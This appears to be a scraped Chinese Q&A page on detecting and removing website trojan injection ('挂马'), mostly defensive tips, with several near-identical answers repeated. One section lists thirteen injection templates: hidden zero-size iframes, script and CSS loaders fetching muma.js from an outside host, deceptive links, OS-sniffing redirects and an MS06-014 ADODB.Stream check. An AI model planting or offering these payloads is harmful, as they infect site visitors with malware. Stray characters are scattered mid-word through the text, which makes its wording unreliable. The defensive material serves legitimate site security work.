㈠ 如何检测访问的网站是否被挂马

第一种挂马:查看网站的收录是否正常。方式为:site:www.你的域名.com注意前面不要加http,看看是否有私版服,还有其权他的不合法的收录,如果有,说明你的网站被挂马了。
第二种挂马:右键查看网页代码,如果有些连七八糟的链接,说明网站被挂了黑链。
第三种挂马:打开某个导航或者网址发现跳转到其他的网站或者网页,说明你的网站被做了js跳转,被挂马了。
第四种挂马:网站后台进不去,或者没有执行权限,说明你的后台被篡改了,可以用ftp看下相关文件,修改一下后台密码。
第五种挂马:网站打不开。很可能是ddos攻击,或者首页被卸掉。如果是ddos可以启用防火墙如果首页被卸掉可以用备份恢复一下。
总之,被挂马的方式很多,要及早发现,及早补上漏洞,避免造成更大的损失。

㈡ 有没有简单办法检查自己网站是否被挂马

最基本的就是 按修改时间来排列所有文件,如果时间被木马修改了,就未必准了。

㈢ 如何进行网站被挂马检测

第一种挂马:查看网站的收录是否正常。方式为:site:www.你的域名.com注意前面不要加http,看看是否有私服,还有其他的不合法的收录,如果有,说明你的网站被挂马了。
第二种挂马:右键查看网页源代码,如果有些连七八糟的链接,说明网站被挂了黑链。
第三种挂马:打开某个导航或者网址发现跳转到其他的网站或者网页,说明你的网站被做了js跳转,被挂马了。
第四种挂马:网站后台进不去,或者没有执行权限,说明你的后台被篡改了,可以用ftp看下相关文件,修改一下后台密码。
第五种挂马:网站打不开。很可能是ddos攻击,或者首页被卸掉。如果是ddos可以启用防火墙如果首页被卸掉可以用备份恢复一下。
总之,被挂马的方式很多,要及早发现,及早补上漏洞,避免造成更大的损失。

㈣ 挂马是什么如何检测网站安全,是否被挂马

所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
第一种:查看网站的收录是否正常。方式为:site:www.你的域名.com注意前面不要加http,看看是否有私服,还有其他的不合法的收录,如果有,说明你的网站被挂马了。

第二种:右键查看网页源代码,如果有些连七八糟的链接,说明网站被挂了黑链。

第三种:打开某个导航或者网址发现跳转到其他的网站或者网页,说明你的网站被做了js跳转,被挂马了。

第四种:网站后台进不去,或者没有执行权限,说明你的后台被篡改了,可以用ftp看下相关文件,修改一下后台密码。

第五种:网站打不开。很可能是ddos攻击,或者首页被卸掉。如果是ddos可以启用防火墙如果首页被卸掉可以用备份恢复一下。

总之,被挂马的方式很多,要及早发现,及早补上漏洞,避免造成更大的损失。

㈤ 怎么检测网站是否被挂马了

个人网站如何检测是否被挂马

挂马的表现:

  • 文件被修改

  • 被写入版其它可执行的文件

  • 传输过程权被修改

  • 最好的前提是做好文件期限,ftp用户和web程序分块,文件期限控制要清晰

    针对第一个问题:
    可以建立白名单和文件的md5数据等清单,做定期对比
    对第二个问题:
    php,可以做好php执行的目录控制,某些目录如果是生成文件或者可以写入文件的,则不允许php执行,直接把php的访问rewrite掉
    第三个问题会比较复杂,如果有代理服务器或者缓存服务器,那可能会被修改,做好服务器的安全工作

    综上其实有一些常规的做法:

  • 服务器安全工作要到位,比如ftp要用sftp,ftp用户期限最小化

  • 文件期限要明确,不能让执行php的用户对你的重要文件有可写的地方

  • 对生成的html文件可以的话,用另外的php进程用户生成,避免文件被修改

  • 程序严防bug,第三方代码经常如此,慎重

  • 控制php的可执行目录,用rewrite方式对安全性有帮助

  • 对重要文件要定期检查是否被修改,当然了,安全性考虑到位,不容易被修改的

  • 建议找专业的安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业.

㈥ 用什么方法可以检查出自己的网站有挂马

检测挂马的方法有:
第一种检测网站被挂马的方法:使用专业的检测工具,比如木马专清道夫等。属

第二种检测网站被挂马的方法:利用google搜索引擎检测。在Google搜索框之间输入你的网站进行检测。如果网站有木马,google会在搜索列表的下方提示该网站有不安全因素。

第三种检测网站被挂马的方法:使用杀毒软件检测,将自己网站的所有内容下载到本地磁盘,进行检测。

第四种检测网站被挂马的方法:人工检测,打开你的网站,查看源文件,根据网页挂马的种类也可以查看是否中了木马。

第五种检测网站被挂马的方法:使用McAfee SiteAdvisor安全浏览网页的插件。

第六种检测网站被挂马的方法:使用360挂马监测中心、瑞星云安全网站联盟等提供的挂马报警服务。通过在网站首页添加监测代码检测。

㈦ 如何检查自己网站是否挂马

如果你的描述没错,你自个开办了一个网站,否则下面的就不用看了。
要防止挂马,主要是以下几条:
一、禁止有人随意进入与改动你的网站里的网页源码,做到防黑。
1、最主要是系统不要有漏洞。
2、关闭所有不应开放的端口。
3、定期查看端口进程情况。
4、保证源码无问题。
5、定期查毒。
6、尽可能不在服务器上运行任何不必要在服务器上运行的软件。
这样就可以保证你的服务器上不会有木马等恶意软件。
二、注意源码漏洞。
某些别人做好的源码可能会产生跨站联接,这些联接可以使来访者经你的网站跨入到别人的网站中背地里下载木马。对此情况的防止主要是通过网站管理者的经验及这些源码的补丁及网上公布的一些方法去对付。
三、来访者本身做好系统漏洞补丁也是一个非常有效的方法,此外,可以让发现问题的朋友以留言等方法告知网站管理者,以及时发现此类现象,采用有效的方法去解决它。

㈧ 网页挂马的检测方式

1.特征匹配。将复网页挂马的脚制本按脚本病毒处理进行检测。但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。
2.主动防御。当浏览器要做出某些动作时,做出提示,例如:下载了某插件的安装包,会提示是否运行。比如浏览器创建一个暴风影音播放器时,提示是否允许运行。在多数情况下用户都会点击是,网页木马会因此得到执行。
3.检查父进程是否为浏览器。这种方法可以很容易的被躲过且会对很多插件造成误报。

㈨ 如何进行网站挂马检测与清除

挂马是常见的对网站和客户都影响巨大的危害之一。如果是在访问出来的源文件的头上,或是最后有被加代码,这个一般是网站文件被要改了,或是ARP,如果是源文件的很多数据位置(中间),那一般是数据库被人挂了。服务器上首先要安装防病毒软件,而且要保持在线病毒库的更新,本人推荐使用eset nod32杀毒软件,效果不错,监测查杀木马很及时,一般如果服务器上的网页里被挂马了,一般都会检测出来。
不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.softxp.net/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body onload="window.location='地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.softxp.net/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script
src=http://www.softxp.net/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.softbar.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_softbar_com();
return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一:判断系统代码
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>
十二:判断是否有ms06014代码
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
十三:智能读取js的代码demo
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"http://www.softxp.net/1/"+u_num+".htm\" width=\"0\" height=\"0\"
frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\"><\/DIV><\/DIV><
\/BODY><\/HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

㈩ 个人网站如何检测是否被挂马

个人网站如何检测是否被挂马

挂马的表现:

  • 文件被修改

  • 被写入其它可执行的文件

  • 传输过程被修改

  • 最好的前提是做好文件期限,ftp用户和web程序分块,文件期限控制要清晰

    针对第一个问题:
    可以建立白名单和文件的md5数据等清单,做定期对比
    对第二个问题:
    如php,可以做好php执行的目录控制,某些目录如果是生成文件或者可以写入文件的,则不允许php执行,直接把php的访问rewrite掉
    第三个问题会比较复杂,如果有代理服务器或者缓存服务器,那可能会被修改,做好服务器的安全工作

    综上其实有一些常规的做法:

  • 服务器安全工作要到位,比如ftp要用sftp,ftp用户期限最小化

  • 文件期限要明确,不能让执行php的用户对你的重要文件有可写的地方

  • 对生成的html文件可以的话,用另外的php进程用户生成,避免文件被修改

  • 程序严防bug,第三方代码经常如此,慎重

  • 控制php的可执行目录,用rewrite方式对安全性有帮助

  • 对重要文件要定期检查是否被修改,当然了,安全性考虑到位,不容易被修改的

  • 建议找专业的安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业.